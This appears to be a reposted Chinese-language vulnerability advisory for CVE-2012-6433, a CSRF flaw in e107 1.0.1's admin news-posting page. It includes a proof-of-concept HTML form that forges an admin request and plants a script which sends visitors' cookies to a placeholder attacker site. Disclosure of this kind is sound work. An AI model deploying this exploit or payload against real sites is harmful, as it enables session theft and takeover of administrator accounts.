admin/newspost.php'跨站请求伪造漏洞

发布日期:2013-01-02
更新日期:2013-01-08

受影响系统:
e107 e107 1.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57092
 CVE(CAN) ID: CVE-2012-6433
 
e107是用php编写的内容管理系统。

e107 1.0.1及其他版本的e107_admin/newspost.php存在CSRF漏洞,该漏洞使得攻击者可以劫持管理员权限发送恶意post请求,并进一步通过构造create操作内的news_title参数来执行跨站脚本攻击。
 
<*来源:Joshua Reynolds
 
  链接:
       
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit:

<html>
 <body>
    <form method="POST" action="http://[site]/e107_admin/newspost.php?create">
        <input type="hidden" value="1"/>
        <input type="hidden" value="<script>location.href='http://[evil_site]/cookiemonster.php?cookie='+document.cookie;</script>"
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value="resize"/>
        <input type="hidden" value="100"/>
        <input type="hidden" value="0"/>
        <input type="hidden" value="0"/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value="1"/>
        <input type="hidden" value="1"/>
        <input type="hidden" value="Post news to database"/>
        <input type="hidden" value=""/>
    </form>
 </body>
 </html>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
e107
 ----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygysd.html